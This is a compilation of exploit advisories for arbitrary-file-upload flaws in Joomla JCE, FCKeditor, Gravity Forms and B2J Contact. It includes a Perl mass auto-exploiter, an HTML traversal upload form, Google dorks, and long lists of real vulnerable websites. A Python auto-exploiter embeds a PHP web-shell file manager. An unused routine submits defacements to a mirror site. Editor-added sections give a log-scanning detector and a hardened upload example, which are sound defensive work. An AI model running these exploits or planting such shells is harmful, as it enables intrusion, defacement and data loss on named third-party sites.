$ua->agent("Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.4) Gecko/20030624 Netscape/7.1 (ax)");
$ua->timeout(10);
system('title JCE Mass Auto Exploiter by KingSkrupellos');
print "JCE Mass Auto Exploiter\n";
print "Coded by KingSkrupellos\n";
print "Cyberizm Digital Security Team\n";
print "Site list, boss:";
my $list = <STDIN>;
chomp($list);
open(THETARGET, "<$list") || die ">>>Cannot open the website list<<< !";
@TARGETS = <THETARGET>;
close THETARGET;
$link = $#TARGETS + 1;

foreach $site (@TARGETS) {
    chomp $site;
    if ($site !~ /http:\/\//) { $site = "http://$site/"; }
    $exploiturl = "/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20";
    print "wait upload $site\n";
    $vulnurl = $site . $exploiturl;
    # Probe: the vulnerable endpoint answers the bare GET with this JSON error.
    $res = $ua->get($vulnurl)->content;
    if ($res =~ m/No function call specified!/i) {
        # Result file path as posted by the author; the handle is opened but never written to.
        open(save, '>>C:\Users\Kullanıcılar\KingSkrupellos\result\list.txt');
        print "\n[Uploading]";
        # Upload attempt: the client supplies the target directory via upload-dir.
        my $res = $ua->post($vulnurl,
            Content_Type => 'form-data',
            Content      => [
                'upload-dir'       => './../../',
                'upload-overwrite' => 0,
                'Filedata'         => ["kingskrupellos.png"],
                'action'           => 'upload'
            ]
        )->decoded_content;
        if ($res =~ m/"error":false/i) {
        } else {
            print " ......... ";
            print color('bold white'); print "[";       print color('reset');
            print color('bold green'); print "PATCHED"; print color('reset');
            print color('bold white'); print "] \n";    print color('reset');
        }
        # The posted script had a half-written IO::Socket::INET->new(...) call here with
        # empty argument values; it did not compile and its result was never used, so it is left out.
        $def = "$site/kingskrupellos.png";
        print colored("[+]Success", 'white on_red'), "\n";
        print "$site/kingskrupellos.png\n";
    } else {
        print colored(">>Exploit failed<<", 'white on_blue'), "\n";
    }
}

# Mirror submission routine, as posted; nothing in the script calls it.
sub zonpost {
    $req       = HTTP::Request->new(GET => $link);
    $useragent = LWP::UserAgent->new();
    $response  = $useragent->request($req);
    $ar        = $response->content;
    if ($ar =~ /Hacked By KingSkrupellos/) {
        $dmn = $link;
        $def = "KingSkrupellos";
        $zn  = "http://aljyyosh.org/single.php";
        $lwp = LWP::UserAgent->new;
        $res = $lwp->post($zn, [
            'defacer'  => $def,
            'domain1'  => $dmn,
            'hackmode' => '15',
            'reason'   => '1',
            'Gönder'   => 'Send',
        ]);
        if ($res->content =~ /color="red">(.*)<\/font><\/li>/) {
            print colored("[-]Sent $1", 'white on_green'), "\n";
        } else {
            print colored("[-]Error", 'black on_white'), "\n";
        }
    } else {
        print " Zone not taken !! \n";
    }
}[/code]

How to use this code on your operating system, e.g. Windows:

Open Start + go to the Search button + type Command Prompt [ cmd.exe ]
Or you can use ConEmu for Windows => https://conemu.github.io => download it and use it.
Create a folder like " jcee " and put your jceexploit.pl and yourimagefile.png, gif, html, txt in it.

C:/Users/Your-Computer-Name/
cd Desktop
cd "jcee"
perl yourexploitcodenamejce.pl site.txt

Waiting for Upload ... Exploit Successful or Not ... Finished

# Uploaded File/Image Directory Path =>
TARGETDOMAIN/yourfilename.png .jpg .gif
TARGETDOMAIN/images/yourfilename.png .jpg .gif
#################################################################################
Example Vulnerable Sites =>

aXbcdance.ro/component/option,com_jce/action,upload/file,imgmanager/lang,en/method,form/plugin,imgmanager/task,plugin/
{"result":{"error":true,"result":""},"error":null} => [ Proof of Concept ] => archive.is/J2eX0 => archive.is/YFanj

sXv-pfaffenhofen.de/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload
{"result":{"error":true,"result":""},"error":null}

bXuses.co.il/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload
{"result":{"error":true,"result":""},"error":null}

irm.edu.vn/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload
pigpilot.net/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload
deep-centr.ru/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload
wintotal.ru/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload
restaurante-chines.com/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload
artlife54.ru/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload
litekstent.ru/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload
artstairs.ru/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload
telltale.co.za/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload
zivapodstran.cz/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload
littlefolkvisuals.com/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload
practicsa.ro/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload
tis.co.th/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload
newconcept-cleaning.co.uk/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload
basolatogucciardi.it/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload
finansure.co.uk/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload
kansystem.ru/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload
comtec.rs/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload
esmikom.ru/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload
farmacovigilanza-online.org/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload
djgonis.gr/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload
diktatura.lt/main/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload
despachosdigitales.com/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload
gebaeudereinigung-pesch.de/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload
jeddah4arch.com/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload
swmoveisplanejados.com.br/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload
psychologie.it/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload
rolsteigerkopen.nl/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload
studiocontabilecapuana.it/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload
traversatacarnica.it/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload
arcade-sages-femmes.ch/asf/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload
alamoconsulting.com/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload
asociacionchajulense.org/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload
caseyfiliaci.com/joomla/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload
dermedica.biz/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload
custer.eu/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload
gimsusz.pl/joomla/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload
guayab.com/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload
physiotherapie-wenus.de/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload
quintasaojoao.net/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload
ocetehnotrade.ru/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload
psxm-tkdm.gr/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload
confatech.com/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload
jeffcole.net/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload
cabanascamilo.com/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload
thesurelink.com/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload
oddjobthesailor.co.uk/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload
linalux-montlesoie.com/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload
mgsopop.ru/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload
pascal-it.it/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload
sicurservice.com/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload
balzamcda.ru/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload
diaocsontra.com/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload
juergenlagger.net/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload
johnmcfaddenattorney.com/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload
spacious.com.tw/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload
kims-ltd.co.uk/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload
percyparkminis.co.uk/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload

THE END
#################################################################################
Discovered By KingSkrupellos from Cyberizm Digital Security Team
#################################################################################
6. # Exploit Title : Powered by Quick.Cart & HOST[24] - profi hosting za 24,- Univex.Cz Fckeditor Arbitrary File Upload Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Vendor Homepage : opensolution.org ~ univex.cz ~ host24.cz
# Google Dorks : intext:''Copyright © 2008 www.univex.cz'' intext:''Powered by Quick.Cart & HOST[24] - profi hosting za 24,-'' site:cz
# Tested On : Windows
# Category : WebApps
# Exploit Risk : Medium
# CWE-264 [ Permissions, Privileges, and Access Controls ]
# CXSecurity : cxsecurity.com/ascii/WLB-2018060297
#################################################################################################
# Exploit : TARGET/fckeditor/editor/filemanager/connectors/uploadtest.html
# Path : TARGET/files/....
#################################################################################################
# Example Vulnerable Sites :
designbaterie.cz/fckeditor/editor/filemanager/connectors/uploadtest.html
letbalonem-darek.cz/fckeditor/editor/filemanager/connectors/uploadtest.html
strihanipsupardubice-salonamber.cz/fckeditor/editor/filemanager/connectors/uploadtest.html
krakonosuv-antikvariat.cz/fckeditor/editor/filemanager/connectors/uploadtest.html
iventilatory.cz/fckeditor/editor/filemanager/connectors/uploadtest.html
jn-models.cz/fckeditor/editor/filemanager/connectors/uploadtest.html
ardewo.cz/eshop/fckeditor/editor/filemanager/connectors/uploadtest.html
chalupaholubov.cz/fckeditor/editor/filemanager/connectors/uploadtest.html
seftrade.cz/fckeditor/editor/filemanager/connectors/uploadtest.html
################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################
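The advisories collected under this tag share one shape: an unauthenticated upload or file-manager endpoint is probed with a fixed URL (the tinymcpuk connector, the JCE imgmanager plugin call, FCKeditor's uploadtest.html, Gravity Forms' gf_page=upload, the B2J Contact qqfile loader), and the JSON or HTML response tells the scanner whether the component is present before a file is pushed at it. Those same URL shapes serve as detection signatures on the defending side. What follows is an added example by the editor, not code from any of the posts on this page, that scans web-server access logs for exactly those request paths; the log lines, IP addresses and timestamps are constructed for the example and the signature names are the editor's own.

```python
import re
from collections import Counter

# Constructed sample access-log lines (combined log format). The hosts are replaced by
# documentation-range IPs and the timestamps are invented; nothing here is taken from
# the target lists in the posts above.
SAMPLE_LOG = """\
203.0.113.7 - - [12/Jun/2018:10:01:02 +0000] "GET /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20 HTTP/1.1" 200 52 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.4) Gecko/20030624 Netscape/7.1 (ax)"
203.0.113.7 - - [12/Jun/2018:10:01:03 +0000] "POST /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload HTTP/1.1" 200 31 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.4) Gecko/20030624 Netscape/7.1 (ax)"
203.0.113.7 - - [12/Jun/2018:10:01:04 +0000] "GET /kingskrupellos.png HTTP/1.1" 404 209 "-" "Mozilla/5.0"
198.51.100.23 - - [12/Jun/2018:10:05:00 +0000] "GET /tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash HTTP/1.1" 200 1842 "-" "Mozilla/5.0"
198.51.100.23 - - [12/Jun/2018:10:05:09 +0000] "GET /fckeditor/editor/filemanager/connectors/uploadtest.html HTTP/1.1" 200 3310 "-" "Mozilla/5.0"
192.0.2.44 - - [12/Jun/2018:10:07:31 +0000] "POST /?gf_page=upload HTTP/1.1" 200 120 "-" "Mozilla/5.0"
192.0.2.44 - - [12/Jun/2018:10:09:12 +0000] "GET /index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&id=138&Itemid=138&qqfile=/../../common.php HTTP/1.1" 200 27 "-" "Mozilla/5.0"
192.0.2.50 - - [12/Jun/2018:10:10:00 +0000] "GET /index.php?option=com_content&view=article&id=5 HTTP/1.1" 200 9031 "-" "Mozilla/5.0"
"""

# Request-path signatures lifted from the exploit URLs quoted in the advisories on this page.
SIGNATURES = {
    "jce_imgmanager": re.compile(
        r"option=com_jce&.*plugin=imgmanager|/component/option,com_jce/action,upload", re.I),
    "tinymcpuk_connector": re.compile(r"/filemanager/browser\.html\?Connector=", re.I),
    "fckeditor_uploadtest": re.compile(
        r"/fckeditor/editor/filemanager/connectors/uploadtest\.html", re.I),
    "gravityforms_upload": re.compile(r"[?&]gf_page=upload(?:&|$)", re.I),
    "b2jcontact_qqfile_traversal": re.compile(r"option=com_b2jcontact&.*qqfile=[^&]*\.\./", re.I),
}

# ip, two ident/user fields, [timestamp], "METHOD path proto", status; the rest is ignored.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) ')


def scan_log(text):
    """Return one hit per log line whose request path matches an upload-probe signature."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        path = m.group("path")
        for name, sig in SIGNATURES.items():
            if sig.search(path):
                hits.append({
                    "ip": m.group("ip"), "ts": m.group("ts"), "method": m.group("method"),
                    "status": int(m.group("status")), "signature": name, "path": path,
                })
                break  # one signature per line is enough
    return hits


def summarize(hits):
    """Signature counts per source IP; a scanner typically walks several in one session."""
    per_ip = {}
    for h in hits:
        per_ip.setdefault(h["ip"], Counter())[h["signature"]] += 1
    return per_ip


def followups(hits):
    """Hits that need a look on the host itself: the server answered 200 to an actual
    upload attempt (a POST) or to a query carrying a traversal sequence. A 200 on a plain
    GET probe only says the component is installed."""
    return [h for h in hits
            if h["status"] == 200 and (h["method"] == "POST" or "../" in h["path"])]


if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for ip, counts in summarize(found).items():
        print(ip, dict(counts))
    for h in followups(found):
        print("FOLLOW UP", h["ip"], h["method"], h["path"])
```

Run it against a real access log by replacing SAMPLE_LOG with the file contents. The status code is a weak signal on its own: the posts above show the vulnerable endpoints returning 200 with a JSON error body for the probe, so after a followups() hit the next step is to list recently written files under the component's upload directory (/images/, /files/, /components/com_b2jcontact/ in the posts above) rather than trust the response code.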
7. # Exploit Title : WordPress Theme Sydney by aThemes 2018 GravityForms Input Remote File Upload Vulnerability
# Author [ Discovered By ] : KingSkrupellos
# Vendor Homepages : athemes.com/theme/sydney/ ~ gravityforms.com
# Tested On : Windows
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-264 [ Permissions, Privileges, and Access Controls ] ~ CWE-434 [ Unrestricted Upload of File with Dangerous Type ]
#################################################################################################
# Google Dork : intext:''Proudly powered by WordPress | Theme: Sydney by aThemes.''

# Exploit HTML Code :

[code]<title>WordPress Theme Sydney by aThemes GravityForms Exploiter</title>
<form action="http://www.TARGETSITE/?gf_page=upload" method="post" enctype="multipart/form-data">
<input type="file" name="file" id="file"><br>
<input name="form_id" value="../../../" type="hidden">
<input name="name" value="kingskrupellos.html" type="hidden">
<input name="gform_unique_id" value="../../" type="hidden">
<input name="field_id" value="" type="hidden">
<input type="submit" name="gform_submit" value="submit">
</form>[/code]

[img=http://www.imageupload.co.uk/images/2018/06/08/gravityphp5athemes.png]

Exploit : TARGET/?gf_page=upload

We cannot upload directly with this exploit, but we can upload our file to the site with the remote file exploiter.

# Error : {"status" : "error", "error" : {"code": 500, "message": "Failed to upload file."}}
[img=http://www.imageupload.co.uk/images/2018/06/08/miplantest1.png]

# Error [ Successful ] : {"status":"ok","data":{"temp_filename":"..\/..\/_input__kingskrupellos.php5","uploaded_filename":"kingskrupellos.php"}}
[img=http://www.imageupload.co.uk/images/2018/06/08/miplantest2.png]

# Allowed File Extensions : .html .htm .php5 .txt .jpg .gif .png .html.fla .phtml .pdf

# You don't need to rename your file to _input__kingskrupellos.php5.
# Just choose a file from your machine and upload it with one of the aforementioned extensions.
# For example, yourfilename.php will be uploaded to the server [ site ] like this: /_input__kingskrupellos.php5

# Example Usage for Windows :
# Use the XAMPP Control Panel and your localhost.
# Use it from the htdocs folder located in XAMPP
# 127.0.0.1/athemeswordpressexploiter.html

# Path : TARGET/_input__kingskrupellos.php5
[img=http://www.imageupload.co.uk/images/2018/06/08/Screenshot_1.png]
#################################################################################################
# Example Site => miplantestclub.com => [ Proof of Concept ] => archive.is/APl6J [ Error ] => archive.is/7G0Jq [ Successful ]
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################
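Three defects recur across the upload advisories on this page: the client supplies the directory (upload-dir=./../../ in the JCE Perl script, form_id=../../../ and gform_unique_id=../../ in the form above, qqfile=/../../ in the B2J Contact post), the server accepts script-capable extensions (.php5, .phtml, .html are all listed as "allowed" above), and the stored name is derived from the client's name, so a later rename can swap the extension (the B2J Contact CVE-2017-5215 pattern cited below). The following is an added example by the editor, not code from the posts or from any of the affected projects, that puts the weak join beside a hardened version of the same step; UPLOAD_ROOT and the allowlist are assumptions for the example, and the sample names are the ones quoted in the posts.

```python
import os
import secrets

# Assumed for this example: where uploads live and which types the application needs.
UPLOAD_ROOT = "/var/www/site/uploads"
ALLOWED_EXTENSIONS = {"jpg", "jpeg", "png", "gif", "pdf", "txt"}
# Deliberately absent: php, php5, phtml, html, htm. The posts above show these being
# accepted; anything the web server may execute or render as a page stays off the list.


class UploadRejected(ValueError):
    """Raised when an upload or rename request fails validation."""


def weak_destination(upload_root, client_dir, client_name):
    """The pattern every advisory on this page abuses: the client picks the directory and
    the file name and the server only joins them. With client_dir="./../../" (the JCE
    script's upload-dir) or client_name="../../x.php5" the result lies outside upload_root."""
    return os.path.normpath(os.path.join(upload_root, client_dir, client_name))


def validated_extension(client_name):
    """Final extension of the client's name, lower-cased, or an UploadRejected. Only the
    part after the last dot counts, and it must match the allowlist exactly, so
    'shell.php.jpg' validates as 'jpg' and 'x.PHP5' is rejected as 'php5'."""
    if "\x00" in client_name:
        raise UploadRejected("NUL byte in filename")
    base = os.path.basename(client_name.replace("\\", "/"))  # drop any directory part
    if base in ("", ".", ".."):
        raise UploadRejected("empty or traversal-only filename")
    if "." not in base:
        raise UploadRejected("no extension")
    ext = base.rsplit(".", 1)[1].lower()
    if ext not in ALLOWED_EXTENSIONS:
        raise UploadRejected("extension %r not allowed" % ext)
    return ext


def safe_destination(upload_root, client_name):
    """Hardened counterpart of weak_destination. The client never chooses the directory;
    the stored name is random plus the validated extension, so 'shell.php.jpg' becomes
    '<hex>.jpg' and Apache-style multi-extension handling has no '.php' left to act on;
    and the final path is still checked to lie under upload_root. A rename or move endpoint
    must go through the same function rather than accept a client-chosen name."""
    ext = validated_extension(client_name)
    stored = "%s.%s" % (secrets.token_hex(16), ext)
    root = os.path.normpath(os.path.abspath(upload_root))
    dest = os.path.normpath(os.path.join(root, stored))
    if os.path.commonpath([root, dest]) != root:
        raise UploadRejected("destination escaped upload root")
    return dest


if __name__ == "__main__":
    # Names quoted in the posts above, run through both paths.
    for client_dir, name in [("./../../", "kingskrupellos.png"),
                             ("", "../../_input__kingskrupellos.php5"),
                             ("", "shell.php.jpg")]:
        print("weak  :", weak_destination(UPLOAD_ROOT, client_dir, name))
        try:
            print("safe  :", safe_destination(UPLOAD_ROOT, name))
        except UploadRejected as e:
            print("reject:", name, "->", e)
```

The random stored name is what closes the rename and double-extension routes: once the server never writes a client-chosen name to disk, a client-chosen extension has nothing to attach to. The commonpath check at the end is defence in depth; with a random name it cannot fail, but it keeps the function safe if someone later lets a sanitized client name back into the path.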
8. # Exploit Title : Joomla Codextrous Com_B2jcontact Component Shell Upload Vulnerability Auto Exploiter Python
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 24/06/2018
# Vendor Homepage : codextrous.com/joomla-components/b2j-contact.html ~ extensions.joomla.org/extension/b2j-contact/
# Tested On : Windows
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-264 [ Permissions, Privileges, and Access Controls ] + CWE-434 [ Unrestricted Upload of File with Dangerous Type ]
#################################################################################################
# Description : B2J Contact is one of the most popular extensions of Codextrous and is used to create contact forms. This revolutionary, multi-functional Joomla! contact form component is super easy to install and brings you the ultimate in User Experience with its clean design and user-friendly backend. You can create as many contact forms as you want. You create a contact form and, to display it, you create its menu as well. The B2J Contact component comes with a module too, with which you can display a contact form wherever you want. B2J Contact has the following main options which users may customize: Basic Option - Default Fields - Dynamic Fields - Events - Security. Each section on its own opens up great custom options/fields for you to play with to get your contact form up and running smoothly. Despite its enormous functionality, the B2J Contact Component is extremely lightweight with an amazing design. Whether you are making an online survey or simply creating another contact form, the B2J Contact Component is there to help you! B2J Contact comes with all the key features mentioned below and more: Joomla! 3.0 Support - In-built Form Builder - Access to extension support system - All features shown on the Demo
#################################################################################################
# Google Dorks :
inurl:''/index.php?option=com_b2jcontact''
inurl:''/components/com_b2jcontact/''
intext:''Another Great Website by One Spot Media.''
intext:''Bootstrap is a front-end framework of Twitter, Inc. Code licensed under MIT License. Font Awesome font licensed under SIL OFL 1.1.''
intext:''POWERED BY VISUALPROJECT WEB''
intext:''© 2013-2014 Opentec SRL, tutti i diritti riservati.''
intext:''honlap: rosko.hu''
+ There are more dorks. Use your brain to find more.

# Exploit : /index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&id=138&Itemid=138&qqfile=/../../"+halah

# Error displayed on the page [ the error language changes according to the country ] :
{"error":"File is empty."}
{"error":"No files were uploaded."}
{"error":"null."}
{"error":"Keine Dateien hochgeladen."}

# Uploaded File Path : /components/com_b2jcontact/.....

# Allowed File Extensions : .php .php5 .html .txt .jpg .jpeg .gif .png .xml .pdf and other extensions.

# Use the Auto Exploiter Tool for this Vulnerability.
#################################################################################################
# Auto Exploitation Tool Python =>

[code]import requests as r
import argparse as arg
import os, sys
import urllib2, urllib, re
from multiprocessing import Pool
from multiprocessing.dummy import Pool as ThreadPool
from urlparse import urlparse
import random, string
# Coded By KingSkrupellos
# Cyberizm Digital Security Team
# Python 2 script as posted (urllib2, urlparse and print statements).

def wibu(length):
    # Random lowercase name; defined but never used below.
    letters = string.ascii_lowercase
    return ''.join(random.choice(letters) for i in range(length))

# PHP payload as posted. Note that it opens a second "<?php" tag while already in PHP
# mode, never closes fUUPd(), and is not a raw string, so Python turns the \" escapes in
# the echo statements into plain quotes. As posted, the payload does not parse as PHP.
shell = """
<?php
function fUUPd($NVAR) {
    $NVAR = gzinflate(base64_decode($NVAR));
    for ($i = 0; $i < strlen($NVAR); $i++) {
        $NVAR[$i] = chr(ord($NVAR[$i]) - 1);
    }
    return $NVAR;
<?php
set_time_limit(0);
error_reporting(0);
if (get_magic_quotes_gpc()) {
    foreach ($_POST as $key => $value) {
        $_POST[$key] = stripslashes($value);
    }
}
echo '<!DOCTYPE HTML>
<HTML>
<HEAD>
<link href="" rel="stylesheet" type="text/css">
<title> CyBeRizM File Manager Sh3LL </title>
<center><img src="http://i.hizliresim.com/3vnXyj.gif"></center>
<style>
body{ font-family: "Racing Sans One", cursive; background-color: #e6e6e6; text-shadow:0px 0px 1px #757575; }
#content tr:hover{ background-color: #636263; text-shadow:0px 0px 10px #fff; }
#content .first{ background-color: silver; }
#content .first:hover{ background-color: silver; text-shadow:0px 0px 1px #757575; }
table{ border: 1px #000000 dotted; }
H1{ font-family: "Rye", cursive; }
a{ color: #000; text-decoration: none; }
a:hover{ color: #fff; text-shadow:0px 0px 10px #ffffff; }
input,select,textarea{ border: 1px #000000 solid; -moz-border-radius: 5px; -webkit-border-radius:5px; border-radius:5px; }
</style>
</HEAD>
<BODY>
<H1><center> Cyberizm.Org / KingSkrupellos </center></H1>
<table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
<tr><td>Where am I? : ';
if (isset($_GET['path'])) {
    $path = $_GET['path'];
} else {
    $path = getcwd();
}
$path = str_replace('\\', '/', $path);
$paths = explode('/', $path);
foreach ($paths as $id => $pat) {
    if ($pat == '' && $id == 0) {
        $a = true;
        echo '<a href="?path=/">/</a>';
        continue;
    }
    if ($pat == '') continue;
    echo '<a href="?path=';
    for ($i = 0; $i <= $id; $i++) {
        echo "$paths[$i]";
        if ($i != $id) echo "/";
    }
    echo '">' . $pat . '</a>/';
}
echo '</td></tr><tr><td>';
if (isset($_FILES['file'])) {
    if (copy($_FILES['file']['tmp_name'], $path . '/' . $_FILES['file']['name'])) {
        echo '<font color="green">File uploaded</font><br />';
    } else {
        echo '<font color="red">File upload failed</font><br />';
    }
}
echo '<form enctype="multipart/form-data" method="POST">
Upload file : <input type="file" name="file" />
<input type="submit" value="Upload" />
</form>
</td></tr>';
if (isset($_GET['filesrc'])) {
    echo "<tr><td>Current File : ";
    echo $_GET['filesrc'];
    echo '</tr></td></table><br />';
    echo('<pre>' . htmlspecialchars(file_get_contents($_GET['filesrc'])) . '</pre>');
} elseif (isset($_GET['option']) && $_POST['opt'] != 'delete') {
    echo '</table><br /><center>' . $_POST['path'] . '<br /><br />';
    if ($_POST['opt'] == 'chmod') {
        if (isset($_POST['perm'])) {
            if (chmod($_POST['path'], $_POST['perm'])) {
                echo '<font color="green">Done!</font><br />';
            } else {
                echo '<font color="red">Sorry!</font><br />';
            }
        }
        echo '<form method="POST">
Permission : <input name="perm" type="text" size="4" value="' . substr(sprintf('%o', fileperms($_POST['path'])), -4) . '" />
<input type="hidden" name="path" value="' . $_POST['path'] . '">
<input type="hidden" name="opt" value="chmod">
<input type="submit" value="Go" />
</form>';
    } elseif ($_POST['opt'] == 'rename') {
        if (isset($_POST['newname'])) {
            if (rename($_POST['path'], $path . '/' . $_POST['newname'])) {
                echo '<font color="green">Saved.</font><br />';
            } else {
                echo '<font color="red">Could not save.</font><br />';
            }
            $_POST['name'] = $_POST['newname'];
        }
        echo '<form method="POST">
New Name : <input name="newname" type="text" size="20" value="' . $_POST['name'] . '" />
<input type="hidden" name="path" value="' . $_POST['path'] . '">
<input type="hidden" name="opt" value="rename">
<input type="submit" value="Go" />
</form>';
    } elseif ($_POST['opt'] == 'edit') {
        if (isset($_POST['src'])) {
            $fp = fopen($_POST['path'], 'w');
            if (fwrite($fp, $_POST['src'])) {
                echo '<font color="green">Saved.</font><br />';
            } else {
                echo '<font color="red">Could not save.</font><br />';
            }
            fclose($fp);
        }
        echo '<form method="POST">
<textarea cols=80 rows=20 name="src">' . htmlspecialchars(file_get_contents($_POST['path'])) . '</textarea><br />
<input type="hidden" name="path" value="' . $_POST['path'] . '">
<input type="hidden" name="opt" value="edit">
<input type="submit" value="Go" />
</form>';
    }
    echo '</center>';
} else {
    echo '</table><br /><center>';
    if (isset($_GET['option']) && $_POST['opt'] == 'delete') {
        if ($_POST['type'] == 'dir') {
            if (rmdir($_POST['path'])) {
                echo '<font color="green">Saved</font><br />';
            } else {
                echo '<font color="red">Sorry</font><br />';
            }
        } elseif ($_POST['type'] == 'file') {
            if (unlink($_POST['path'])) {
                echo '<font color="green">Deleted.</font><br />';
            } else {
                echo '<font color="red">Could not delete.</font><br />';
            }
        }
    }
    echo '</center>';
    $scandir = scandir($path);
    echo '<div id="content"><table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
<tr class="first">
<td><center>File name</center></td>
<td><center>Size</center></td>
<td><center>Permissions</center></td>
<td><center>Actions</center></td>
</tr>';
    foreach ($scandir as $dir) {
        if (!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue;
        echo "<tr>
<td><a href=\"?path=$path/$dir\">$dir</a></td>
<td><center>--</center></td>
<td><center>";
        if (is_writable("$path/$dir")) echo '<font color="green">';
        elseif (!is_readable("$path/$dir")) echo '<font color="red">';
        echo perms("$path/$dir");
        if (is_writable("$path/$dir") || !is_readable("$path/$dir")) echo '</font>';
        echo "</center></td>
